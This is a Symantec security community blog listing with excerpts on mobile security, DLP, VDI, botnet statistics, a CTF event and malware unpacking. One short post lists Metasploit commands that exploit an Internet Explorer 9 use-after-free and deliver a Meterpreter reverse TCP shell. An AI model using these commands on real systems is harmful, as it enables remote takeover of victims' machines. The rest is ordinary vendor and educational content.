Video Screencast Help
Symantec to Separate Into Two Focused, Industry-Leading Technology Companies. Learn more.
Security Community Blog
Showing posts tagged with Symantec Mobility Threat Protection
Showing posts in English
Pritesh J. Chauhan | 11 Oct 2012 | 0 comments

Over the last few weeks we have been working with a number of customers who have large administrative overheads when protecting their IT Infrastructure.

When selecting a new service they have either gone to tender or bought an off the shelf solution upon recommendation from colleagues/friends. 

Whilst this may seem great at first, over the years this has built up a number of systems each requiring their own management systems, portals, update systems and most importantly, they lack integration between solutions. Whilst this may seem like a large problem, it gets worse - the issue with these customers was that they had multiple products performing conflicting tasks. 

One example from a customer who had one product that is designed to AV scan contents of a USB pen drive upon connection to the machine. Another product to encrypt USB pen drives upon connection. This is great if the admin could enforce this order, but what was actually happening is...

Fabiano.Pessoa | 27 Sep 2012 | 0 comments

We got a discovered vulnerability in IE 9 on 17/09/2012 which can be exploited as following command in Backtrack 5 R2


- msfupdate
- Use exploit / windows / browser / ie_execcommand_uaf
- Set SRVHOST 192,168 ...
- Set PAYLOAD windows / Meterpreter / reverse_tcp
- Set LHOST 192,168 ...
- exploit

Let's beware the networking.


Elspeth Magoria | 06 Sep 2012 | 0 comments

Join Symantec and Washington University at the St. Louis Symantec $25k Cyber Security Challenge. This one-of-a-kind event invites security professionals and ethical hackers like yourself to help further improve current security technologies and solutions.

Come learn about the current global threat landscape and IT trends requiring organizations to take new approaches in security – cloud, mobility, compliance, etc.

Stay for the "Challenge", an exciting cyber "Capture the Flag" (CTF) simulation. Take part for a chance to win cash and prizes! And don't miss the Hands-On Security Demo Lab that will showcase current security solutions around mobile, data loss, encryption, email and web security and more.

Be There To Win - All registered attendees get a $50 Gift Card and if you refer two friends and they attend...

Symantec Corp. | 20 Aug 2012 | 0 comments

by John Bordwine, Symantec

In July, NIST issued the draft of Special Publication 800-124, Revision 1, "Guidelines for Managing and Securing Mobile Devices in the Enterprise,” which updates formal recommendations for the secure management of mobile devices throughout the Federal Government.

NIST released its original publication on the topic (“Guidelines on Cell Phone and PDA Security”) just four years ago, but as its title suggests, dramatic shifts in the mobile device landscape since 2008 have necessitated hefty revisions.

Truly, the importance of up-to-date guidance for government agencies introducing new mobile solutions cannot be understated. According to survey results from Symantec’s 2011 Government Symposium, 75% of Federal IT professionals say the adoption of new mobile devices has increased their security risks,...

Jhildy11 Xcend Group | 14 Aug 2012 | 0 comments

In case you missed it, see the archived version from last weeks webinar " Learn How to Protect Even Your Hardest-to-Find IP with Intelligent Data Loss Prevention"

With the average cost of a breach now topping an incomprehensible $7 million, more and more organizations are looking to Data Loss Prevention solutions to protect their highest value data. Join XCEND, a Platinum Symantec partner and DLP Master Specialist, to learn how you can accurately detect and protect all types of confidential data wherever it is stored or used.  (54 min)
Here's the Link to see the Archived Version: or go to our website at  to see all of the archived,...
Mark Alba | 26 Jun 2012 | 0 comments

End-user computing environments evolve continually, leading to increasingly mobile users that require access to their data and applications anytime from anywhere. Virtual Desktops are hence a critical component in delivering data and applications to any device, anywhere and anytime.  Such virtual access is often misconstrued to be an easy and manageable solution, while in reality, it is IT’s worst nightmare.  Virtual access to thousands of users brings security and manageability challenges.

Symantec and VMware’s partnership combines the industry leading solutions from both organizations to deliver secure and easy-to-manage virtual desktops.  This solution will provide enterprises and IT service providers with a cost-effective way of leveraging on-premise VDI with the efficiencies and scalability of cloud computing.

Symantec’s award-winning security and management solutions integrate with VMwareView to enable organizations embrace the...

Mira Davda | 29 May 2012 | 0 comments

Augmented by broadband penetration smaller and emerging cities of India are exploring opportunities offered by the virtual world. This group of connected people and businesses has reached critical mass and is lucrative enough to be targeted by cyber criminals.

Indian Cities such as Bhubaneshwar, Surat, Cochin, Jaipur, Vishakhapatnam and Indore are increasingly facing the risk of cyber attacks, with one in four bot- infections in India reported in such cities, reveals India findings of Symantec Internet Security Threat Report, Volume (ISTR) 17. Also, some cities that repeatedly appear in the list for origin of phishing in India - Ahmedabad,  Nashik and Coimbatore also figure in the list of bot-infections.  Botnets are networks of zombie machines that are used to perform sophisticated attacks  and conduct coordinated attacks. The presence of bot-infected computers in these locations indicates that they are being inducted as part of a network of compromised...

Marie Pettersson | 10 Feb 2012 | 1 comment

I am absolutely blown away with what is going on in the mobile world and the latest numbers from IDC demonstrate the fact that mobile is breaking every record. A year on year growth of 57% for Smartphone shipments compared to last year. Do I need to say more? These devices will be used for business and private matters and they function merely as a pc. So what is the difference?  I think that we don’t consider that question enough, we simply use it together with all the features we can get our hands on; mobile banking and payments, browsing the web, reading emails, downloading apps, gathering intelligence, and the list goes on... So why should we separate the way we manage mobile devices from any other device or endpoint connected to our network?

Adaptive Mobile did a report last year on the mobile threats and their key conclusions were that mobile scams are way more profitable than the traditional pc scams (2%...

tiffany_jones | 15 Dec 2011 | 0 comments

With the significant increase over the last few years in new smart phones, smart devices, and tablets, the demand by government employees to utilize these devices for work and home use is growing.  We called this phenomena the “consumerization of IT.”  Using these types of devices can increase productivity for government employees, assist consumers with accessing citizen services via custom government apps, and allow troops on the ground in remote locations the ability to get access to mission critical data and applications.

However, along with the benefits come risks as well.  We are an app happy society which is wonderful for us…..and for the bad guys.  Of the hundreds of mobile device threats we saw in 2010 and 2011, many of them exploit vulnerabilities in mobile applications by installing Trojans, etc.  SMS senders are also becoming quite popular as a threat vector.  Most of these threats exploit social engineering tactics...

Dinesh Theerthagiri | 17 Nov 2011 | 1 comment

This article presents information on manual unpacking of protected malicious Windows executables using the OllyDbg debugger. It also involve in fully rebuild the import table so the file can be restored to its original state and executed. Many anti-virus vendors categorized UPX, NsPack, ASpack and many other PE packers as malicious software.

Packers ???

A 'Packer' is a compression routine that squeezes an executable file. These programs created to reduce disk space and make downloads faster. It makes difficult to understand the original file and make it tricky to match the file signature of a compressed file. Packers initially send PE internal structures and then it identifies PE header, Export table, and import table in new structures & attaches code segment before OEP, called as STUB .i.e. the compressed executable is shifted to data section of newly created file. PE header & section header is no more useful since data is compressed means...